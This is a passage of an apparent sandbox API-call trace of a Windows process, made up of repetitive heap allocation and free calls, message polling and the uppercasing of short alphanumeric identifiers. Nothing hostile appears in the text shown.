(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.216] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.217] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.217] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.217] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.218] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.218] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.218] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.218] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.219] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.219] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.219] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.220] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.221] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.221] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.221] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.221] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.222] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.222] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.223] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.223] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.223] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.223] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0196.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.224] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0196.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.225] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: 